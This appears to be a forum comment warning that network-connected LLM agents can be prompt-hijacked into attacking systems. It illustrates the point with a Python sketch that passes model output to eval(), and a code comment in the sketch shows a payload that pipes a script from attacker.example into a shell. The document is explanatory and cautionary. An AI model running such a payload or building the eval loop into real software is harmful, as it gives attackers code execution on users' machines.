But in short, as I said in my GP comment, systems like OpenAssistant are being given the ability to make network calls in order to take actions.
Regardless of whether the system "knows" what an action "means", or whether those actions constitute "harm", if it hallucinates a script-kiddie persona in its prompt context (or is prompt-hijacked into one) and starts emitting actions that attack external systems, harm will ensue.
Rather than "launch nukes", consider more immediate possibilities: "post harassing/abusive tweets", "dox this person", "impersonate this person and do bad/criminal things", and so on. It should take little imagination to come up with harmful results from attaching an LLM to `eval()` on a network-connected machine.
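To make that last point concrete, here's a minimal sketch of the anti-pattern: model output fed straight into `eval()`. `get_llm_completion` is a hypothetical stand-in for any real model API; the point is that once the loop exists, anything that steers the model's output (a hallucinated persona, an injected prompt) becomes arbitrary code execution on the host:

    def get_llm_completion(prompt: str) -> str:
        # Placeholder: imagine this returns text from an LLM. A hijacked
        # context could just as easily make it return something like:
        #   "__import__('os').system('curl attacker.example/x | sh')"
        return "1 + 1  # benign today; attacker-controlled tomorrow"

    def naive_agent_step(user_input: str) -> object:
        action = get_llm_completion(f"Decide what to do about: {user_input}")
        # The dangerous line: untrusted, model-generated text is executed
        # with the full privileges and network access of this process.
        return eval(action)

    print(naive_agent_step("summarize my inbox"))

Nothing in that loop distinguishes a "good" action string from a malicious one; the model's output *is* the attack surface.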